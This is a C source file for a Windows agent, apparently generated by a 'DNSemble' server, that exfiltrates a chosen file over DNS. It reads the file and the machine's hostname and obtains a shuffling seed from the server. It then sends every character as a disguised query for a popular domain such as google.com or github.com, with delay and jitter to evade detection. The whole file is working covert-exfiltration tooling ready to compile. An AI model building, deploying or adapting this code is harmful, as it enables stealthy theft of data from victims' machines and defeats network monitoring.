/*
 * DNSemble Agent — Windows DNS Exfiltration Client
 * Generated by DNSemble server.
 *
 * Cross-compile (Linux -> Windows):
 *   x86_64-w64-mingw32-gcc -o agent.exe agent.c -lws2_32 -O2 -s
 */

#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma comment(lib, "ws2_32.lib")

/* ── Configuration (baked at generation time) ──────────────────────── */
static const char *CFG_SERVER = "{{SERVER_HOST}}";
static int CFG_PORT           = {{SERVER_PORT}};
static int CFG_DELAY          = {{DELAY}};
static int CFG_JITTER         = {{JITTER}};

/* ── Protocol ──────────────────────────────────────────────────────── */
#define CTRL_DOMAIN "googleapis.com"
#define NCHARS      98
#define QTYPE_A     1
#define QTYPE_MX    15
#define QTYPE_AAAA  28

#define CTRL_SESSION_START 0
#define CTRL_END_HOSTNAME  1
#define CTRL_END_FILENAME  2
#define CTRL_END_CONTENT   3
#define CTRL_CHUNK_OFFSET  3

static const char *DOMAINS[NCHARS] = {
    "google.com", "youtube.com", "facebook.com", "twitter.com",
    "instagram.com", "linkedin.com", "reddit.com", "pinterest.com",
    "tumblr.com", "snapchat.com", "github.com", "stackoverflow.com",
    "microsoft.com", "apple.com", "amazon.com", "netflix.com",
    "spotify.com", "twitch.tv", "discord.com", "telegram.org",
    "ebay.com", "walmart.com", "target.com", "bestbuy.com",
    "etsy.com", "shopify.com", "paypal.com", "stripe.com",
    "squarespace.com", "wix.com", "godaddy.com", "namecheap.com",
    "cloudflare.com", "cnn.com", "bbc.com", "nytimes.com",
    "reuters.com", "forbes.com", "bloomberg.com", "wsj.com",
    "theguardian.com", "washingtonpost.com", "usatoday.com", "espn.com",
    "weather.com", "imdb.com", "rottentomatoes.com", "hulu.com",
    "disneyplus.com", "soundcloud.com", "vimeo.com", "dailymotion.com",
    "deviantart.com", "flickr.com", "booking.com", "expedia.com",
    "tripadvisor.com", "airbnb.com", "uber.com", "lyft.com",
    "zillow.com", "realtor.com", "yelp.com", "opentable.com",
    "dropbox.com", "box.com", "notion.so", "trello.com",
    "slack.com", "zoom.us", "skype.com", "evernote.com",
    "todoist.com", "asana.com", "wikipedia.org", "quora.com",
    "khanacademy.org", "coursera.org", "udemy.com", "edx.org",
    "duolingo.com", "archive.org", "britannica.com", "dictionary.com",
    "yahoo.com", "bing.com", "duckduckgo.com", "brave.com",
    "whatsapp.com", "signal.org", "tiktok.com", "claude.ai",
    "anthropic.com", "openai.com", "x.com", "tesla.com",
    "spacex.com", "oracle.com",
};

/* ── Character set: printable ASCII (32-126) + \n \t \r ────────────── */
static char ALL_CHARS[NCHARS];
static const char *char_map[256];

static void init_charset(void) {
    int n = 0, i;
    for (i = 32; i <= 126; i++) ALL_CHARS[n++] = (char)i;
    ALL_CHARS[n++] = '\n';
    ALL_CHARS[n++] = '\t';
    ALL_CHARS[n++] = '\r';
    memset(char_map, 0, sizeof(char_map));
}

/* ── Mersenne Twister (CPython-compatible) ─────────────────────────── */
#define MT_N 624
#define MT_M 397

static uint32_t mt_state[MT_N];
static int mt_idx = MT_N + 1;

static void mt_init_genrand(uint32_t s) {
    mt_state[0] = s;
    for (mt_idx = 1; mt_idx < MT_N; mt_idx++)
        mt_state[mt_idx] = 1812433253U *
            (mt_state[mt_idx - 1] ^ (mt_state[mt_idx - 1] >> 30))
            + (uint32_t)mt_idx;
}

static void mt_seed(uint32_t seed) {
    uint32_t key[1];
    int i, j, k;
    key[0] = seed;
    mt_init_genrand(19650218U);
    i = 1; j = 0;
    k = MT_N;
    for (; k; k--) {
        mt_state[i] = (mt_state[i] ^
            ((mt_state[i - 1] ^ (mt_state[i - 1] >> 30)) * 1664525U))
            + key[j] + (uint32_t)j;
        i++; j++;
        if (i >= MT_N) { mt_state[0] = mt_state[MT_N - 1]; i = 1; }
        if (j >= 1) j = 0;
    }
    for (k = MT_N - 1; k; k--) {
        mt_state[i] = (mt_state[i] ^
            ((mt_state[i - 1] ^ (mt_state[i - 1] >> 30)) * 1566083941U))
            - (uint32_t)i;
        i++;
        if (i >= MT_N) { mt_state[0] = mt_state[MT_N - 1]; i = 1; }
    }
    mt_state[0] = 0x80000000U;
    mt_idx = MT_N;
}

static uint32_t mt_next(void) {
    uint32_t y;
    static const uint32_t mag01[2] = {0, 0x9908b0dfU};
    if (mt_idx >= MT_N) {
        int kk;
        for (kk = 0; kk < MT_N - MT_M; kk++) {
            y = (mt_state[kk] & 0x80000000U) | (mt_state[kk + 1] & 0x7fffffffU);
            mt_state[kk] = mt_state[kk + MT_M] ^ (y >> 1) ^ mag01[y & 1];
        }
        for (; kk < MT_N - 1; kk++) {
            y = (mt_state[kk] & 0x80000000U) | (mt_state[kk + 1] & 0x7fffffffU);
            mt_state[kk] = mt_state[kk + (MT_M - MT_N)] ^ (y >> 1) ^ mag01[y & 1];
        }
        y = (mt_state[MT_N - 1] & 0x80000000U) | (mt_state[0] & 0x7fffffffU);
        mt_state[MT_N - 1] = mt_state[MT_M - 1] ^ (y >> 1) ^ mag01[y & 1];
        mt_idx = 0;
    }
    y = mt_state[mt_idx++];
    y ^= y >> 11;
    y ^= (y << 7) & 0x9d2c5680U;
    y ^= (y << 15) & 0xefc60000U;
    y ^= y >> 18;
    return y;
}

static int randbelow(int n) {
    int k, t;
    uint32_t r;
    if (n <= 1) return 0;
    k = 0; t = n;
    while (t > 0) { k++; t >>= 1; }
    do { r = mt_next() >> (32 - k); } while (r >= (uint32_t)n);
    return (int)r;
}

static void build_mapping(uint32_t seed) {
    int perm[NCHARS], i, j, tmp;
    mt_seed(seed);
    for (i = 0; i < NCHARS; i++) perm[i] = i;
    for (i = NCHARS - 1; i > 0; i--) {
        j = randbelow(i + 1);
        tmp = perm[i]; perm[i] = perm[j]; perm[j] = tmp;
    }
    for (i = 0; i < NCHARS; i++)
        char_map[(unsigned char)ALL_CHARS[i]] = DOMAINS[perm[i]];
}

/* ── DNS wire format ───────────────────────────────────────────────── */
static int dns_encode_name(const char *domain, unsigned char *buf) {
    int pos = 0;
    while (*domain) {
        const char *dot = strchr(domain, '.');
        int len = dot ? (int)(dot - domain) : (int)strlen(domain);
        buf[pos++] = (unsigned char)len;
        memcpy(buf + pos, domain, len);
        pos += len;
        domain += len + (dot ? 1 : 0);
    }
    buf[pos++] = 0;
    return pos;
}

static int dns_build_query(uint16_t txid, const char *domain,
                           uint16_t qtype, unsigned char *buf) {
    int pos;
    buf[0] = (unsigned char)(txid >> 8);
    buf[1] = (unsigned char)(txid & 0xFF);
    buf[2] = 0x01; buf[3] = 0x00;
    buf[4] = 0x00; buf[5] = 0x01;
    buf[6] = buf[7] = buf[8] = buf[9] = buf[10] = buf[11] = 0;
    pos = 12 + dns_encode_name(domain, buf + 12);
    buf[pos++] = (unsigned char)(qtype >> 8);
    buf[pos++] = (unsigned char)(qtype & 0xFF);
    buf[pos++] = 0x00; buf[pos++] = 0x01;
    return pos;
}

static int dns_parse_a(unsigned char *data, int len, unsigned char ip[4]) {
    int off;
    uint16_t ancount, rtype, rdlen;
    if (len < 12) return 0;
    ancount = (uint16_t)((data[6] << 8) | data[7]);
    if (ancount < 1) return 0;
    off = 12;
    while (off < len && data[off] != 0) off += 1 + data[off];
    off += 5;
    if (off + 2 > len) return 0;
    if ((data[off] & 0xC0) == 0xC0) off += 2;
    else { while (off < len && data[off]) off += 1 + data[off]; off++; }
    if (off + 10 > len) return 0;
    rtype = (uint16_t)((data[off] << 8) | data[off + 1]);
    off += 8;
    rdlen = (uint16_t)((data[off] << 8) | data[off + 1]);
    off += 2;
    if (rtype == 1 && rdlen == 4 && off + 4 <= len) {
        memcpy(ip, data + off, 4);
        return 1;
    }
    return 0;
}

/* ── Network ───────────────────────────────────────────────────────── */
static SOCKET g_sock;
static struct sockaddr_in g_srv;

static int net_send(uint16_t txid, const char *domain, uint16_t qtype,
                    unsigned char *resp_out, int *rlen_out) {
    unsigned char pkt[512], buf[4096];
    int n, alen;
    n = dns_build_query(txid, domain, qtype, pkt);
    sendto(g_sock, (char *)pkt, n, 0,
           (struct sockaddr *)&g_srv, sizeof(g_srv));
    alen = sizeof(g_srv);
    n = recvfrom(g_sock, (char *)buf, sizeof(buf), 0,
                 (struct sockaddr *)&g_srv, &alen);
    if (n > 0) {
        if (resp_out) { memcpy(resp_out, buf, n); if (rlen_out) *rlen_out = n; }
        return 1;
    }
    return 0;
}

static int net_ctrl(int cid, int seq, unsigned char *resp, int *rlen) {
    uint16_t txid = (uint16_t)(((cid & 0xFF) << 8) | (seq & 0xFF));
    return net_send(txid, CTRL_DOMAIN, QTYPE_A, resp, rlen);
}

/* ── Phase sender ──────────────────────────────────────────────────── */
static int send_phase(int cid, const char *text, int len,
                      uint16_t qtype, int delay_ms, int jitter_ms) {
    int sent = 0, seq = 0, chunk = 0, i, b, d, filled, pct;
    uint16_t txid;
    const char *dom;

    for (i = 0; i < len; i++) {
        dom = char_map[(unsigned char)text[i]];
        if (!dom) continue;

        txid = (uint16_t)(((cid & 0xFF) << 8) | (seq & 0xFF));
        net_send(txid, dom, qtype, NULL, NULL);
        sent++; seq++;

        if (seq > 255) {
            chunk++;
            net_ctrl(cid, CTRL_CHUNK_OFFSET + chunk, NULL, NULL);
            seq = 0;
        }

        filled = len ? sent * 30 / len : 30;
        pct = len ? sent * 100 / len : 100;
        printf("\r  [");
        for (b = 0; b < 30; b++) putchar(b < filled ? '#' : '-');
        printf("]  %d/%d  %d%%  ", sent, len, pct);
        fflush(stdout);

        d = delay_ms;
        if (jitter_ms > 0)
            d += (rand() % (2 * jitter_ms + 1)) - jitter_ms;
        if (d > 0) Sleep((DWORD)d);
    }

    if (len) {
        printf("\r  [");
        for (b = 0; b < 30; b++) putchar('#');
        printf("]  %d/%d  100%%  DONE\n", sent, len);
    }
    return sent;
}

/* ── File reading ──────────────────────────────────────────────────── */
static char *read_file(const char *path, int *out_len) {
    FILE *f;
    long sz;
    char *buf;
    int n;

    f = fopen(path, "r");
    if (!f) return NULL;
    fseek(f, 0, SEEK_END);
    sz = ftell(f);
    fseek(f, 0, SEEK_SET);
    buf = (char *)malloc((size_t)sz + 1);
    if (!buf) { fclose(f); return NULL; }
    n = (int)fread(buf, 1, (size_t)sz, f);
    buf[n] = '\0';
    fclose(f);
    if (out_len) *out_len = n;
    return buf;
}

static const char *get_basename(const char *path) {
    const char *p = strrchr(path, '\\');
    const char *q = strrchr(path, '/');
    if (q && (!p || q > p)) p = q;
    return p ? p + 1 : path;
}

/* ── Main ──────────────────────────────────────────────────────────── */
int main(int argc, char **argv) {
    const char *filepath, *server, *filename;
    int port, delay_ms, jitter_ms, cid, i;
    int content_len, host_len, file_len, queries;
    char *content;
    char hostname[256];
    WSADATA wsa;
    DWORD timeout, t0, elapsed;
    double secs;
    uint32_t seed;
    int got_seed;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <file> [-s server] [-p port] "
                "[-d delay_ms] [-j jitter_ms] [-c client_id]\n", argv[0]);
        return 1;
    }

    filepath = argv[1];
    server = CFG_SERVER;
    port = CFG_PORT;
    delay_ms = CFG_DELAY;
    jitter_ms = CFG_JITTER;
    cid = -1;

    for (i = 2; i < argc - 1; i += 2) {
        if (!strcmp(argv[i], "-s"))      server = argv[i + 1];
        else if (!strcmp(argv[i], "-p")) port = atoi(argv[i + 1]);
        else if (!strcmp(argv[i], "-d")) delay_ms = atoi(argv[i + 1]);
        else if (!strcmp(argv[i], "-j")) jitter_ms = atoi(argv[i + 1]);
        else if (!strcmp(argv[i], "-c")) cid = atoi(argv[i + 1]);
    }

    srand((unsigned int)GetTickCount());
    if (cid < 0 || cid > 255) cid = rand() % 255 + 1;

    init_charset();

    content = read_file(filepath, &content_len);
    if (!content) {
        fprintf(stderr, "[!] Cannot read: %s\n", filepath);
        return 1;
    }

    memset(&wsa, 0, sizeof(wsa));
    if (WSAStartup(MAKEWORD(2, 2), &wsa)) {
        fprintf(stderr, "[!] WSAStartup failed\n");
        free(content);
        return 1;
    }

    memset(hostname, 0, sizeof(hostname));
    gethostname(hostname, sizeof(hostname) - 1);
    filename = get_basename(filepath);
    host_len = (int)strlen(hostname);
    file_len = (int)strlen(filename);

    printf("[*] DNSemble Agent (native)\n");
    printf("    Server:   %s:%d\n", server, port);
    printf("    Client:   #%d\n", cid);
    printf("    File:     %s (%d bytes)\n", filepath, content_len);
    printf("    Timing:   %dms delay, %dms jitter\n\n", delay_ms, jitter_ms);

    g_sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (g_sock == INVALID_SOCKET) {
        fprintf(stderr, "[!] Socket creation failed\n");
        WSACleanup();
        free(content);
        return 1;
    }

    timeout = 2000;
    setsockopt(g_sock, SOL_SOCKET, SO_RCVTIMEO,
               (char *)&timeout, sizeof(timeout));

    memset(&g_srv, 0, sizeof(g_srv));
    g_srv.sin_family = AF_INET;
    g_srv.sin_port = htons((unsigned short)port);
    g_srv.sin_addr.s_addr = inet_addr(server);

    t0 = GetTickCount();
    queries = 0;

    /* Phase 0: SESSION_START — negotiate dynamic mapping */
    printf("[*] Negotiating session ...\n");
    seed = 0;
    got_seed = 0;
    for (i = 0; i < 3; i++) {
        unsigned char resp[4096];
        unsigned char ip[4];
        int rlen;
        queries++;
        if (net_ctrl(cid, CTRL_SESSION_START, resp, &rlen)) {
            if (dns_parse_a(resp, rlen, ip)) {
                seed = ((uint32_t)ip[0] << 24) | ((uint32_t)ip[1] << 16) |
                       ((uint32_t)ip[2] << 8)  | (uint32_t)ip[3];
                got_seed = 1;
                break;
            }
        }
        Sleep(500);
    }

    if (!got_seed) {
        fprintf(stderr, "[!] Failed to negotiate session\n");
        closesocket(g_sock);
        WSACleanup();
        free(content);
        return 1;
    }

    build_mapping(seed);
    printf("[+] Session established (seed=0x%08X)\n", (unsigned int)seed);
    Sleep((DWORD)delay_ms);

    /* Phase 1: hostname (AAAA) */
    printf("[*] Sending hostname: %s\n", hostname);
    queries += send_phase(cid, hostname, host_len,
                          QTYPE_AAAA, delay_ms, jitter_ms);
    net_ctrl(cid, CTRL_END_HOSTNAME, NULL, NULL);
    queries++;
    Sleep((DWORD)delay_ms);

    /* Phase 2: filename (MX) */
    printf("[*] Sending filename: %s\n", filename);
    queries += send_phase(cid, filename, file_len,
                          QTYPE_MX, delay_ms, jitter_ms);
    net_ctrl(cid, CTRL_END_FILENAME, NULL, NULL);
    queries++;
    Sleep((DWORD)delay_ms);

    /* Phase 3: content (A) */
    printf("[*] Sending content (%d chars)\n", content_len);
    queries += send_phase(cid, content, content_len,
                          QTYPE_A, delay_ms, jitter_ms);
    net_ctrl(cid, CTRL_END_CONTENT, NULL, NULL);
    queries++;

    elapsed = GetTickCount() - t0;
    secs = elapsed / 1000.0;
    printf("\n[+] Done! %d queries in %.1fs (%.1f q/s)\n",
           queries, secs, secs > 0 ? queries / secs : 0);

    closesocket(g_sock);
    WSACleanup();
    free(content);
    return 0;
}
